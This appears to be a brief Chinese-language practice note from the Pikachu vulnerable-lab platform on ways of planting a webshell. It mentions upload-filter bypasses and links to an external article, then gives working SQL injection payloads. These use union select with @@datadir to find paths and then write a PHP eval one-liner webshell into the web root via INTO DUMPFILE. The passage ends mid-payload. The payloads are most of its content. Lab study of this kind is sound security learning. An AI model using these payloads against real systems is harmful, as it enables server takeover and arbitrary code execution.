测试:pikachu平台
研究了几种写入webshell的方式
一、上传漏洞写入
包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html
二、sql注入写入
前提是有root权限
sql注入写入一句话木马
可以根据本地包含报错查找路径
C:\xampp\htdocs\pikachu\vul\fileinclude
也可以根据
union select 1,@@datadir查找mysql data路径
C:\xampp\mysql\data(但是没有开web访问权限也没有用的)
两种方法都可
union select 1,"<?php eval($_POST[666]);?>" into dumpfile "C:\\xampp\\htdocs\\pikachu\\vul\\fileinclude\\qimingfuckyou.php"
union select 1,"<?p